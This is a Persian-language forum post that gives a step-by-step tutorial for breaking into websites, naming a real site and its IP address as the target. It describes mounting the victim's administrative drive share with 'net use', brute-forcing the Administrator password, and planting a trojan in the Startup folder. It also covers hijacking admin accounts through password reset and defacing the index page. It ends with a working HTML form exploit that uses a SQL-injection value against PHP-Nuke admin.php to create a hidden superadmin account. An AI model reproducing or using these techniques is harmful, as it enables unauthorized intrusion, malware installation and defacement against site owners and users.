Gytyonline
مديريت كل انجمنها
پست: 899
عضو شده در: 14 شهریور 1384
محل سکونت: tehran
امتياز: 8184
|
عنوان: آموزش هك كردن سايت |
|
|
سلام دوستان اميدوارم الان براي هك كردن يك فروم phpbb آماده باشيد .
من يك روش رو براتون معرفي مي كنم . تا آخر كار با هم مي ريم.
حتما جهت هك كردن سايت از phpnuke بودن اون حتما مطلع باشيد .
هك كردن يك كمي سخته ولي با كمي حوصله و دقت به نتيجه مي رسيد .
شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که
خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... )
اول بايد ip سايت مورد نظرتون رو پيدا كنيد مثلا سايت
http://www.tadarokestan.com/
براي بدست آوردن ip اين سايت من به اين روش عمل مي كنم.
روش whois : براي استفاده از اين روش من در مرورگرم دستور زير را تايپ مي كنم.
http://www.samspade.org/t/ipwhois?a=xxxxxx كه بجاي
xxxxxx
آدرس tadarokestan.com را وارد مي كنم. بعد آدرس ip سايت رو از
آدرس
http://www.samspade.org/t/ipwhois?a=tadarokestan.com
دريافت مي كنم . كه ip سايت ( 64.207.218.217) مي باشد . از عبارت
tadarokestan.com = [ 64.207.218.217 ]
خوب حالا تونستيم ip سايت رو از بهترين روش پيدا كنيم . حالا شروع مي كنيم.
از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
من حرف X رو براي اين گذاشتم كه شما بجاي اون هر حرفي بجز درايو هاي خودتون بگذاريد . مثلا w
بجاي ip تو آدرس هم مي توانيد آدرس ip كه بدست آورده ايد قرار بدهيد . مثلا ( 64.207.218.217)
بجاي DriveName مي توانيد اون درايوي رو مي خواهيد Share كنيد بنويسيد . من يك نمونه براتون آماده كردم .
Net use w: \\64.207.218.217\c$ خوب حالا اگه User Name و Password از شما نخواهد درايو براحتي Share
مي شود . و اين پيغام رو براتون مي زنه .....The command completed successfully و اگر از شما User Name و Password
خواست شما يورز رو Administrator بزنيد و پ پسورد هم میتوانید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت
کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نويسنده : فرشاد عزيز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما
اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد
فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل
(کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin )
یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز
برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می
کند.
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>
خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!
|
|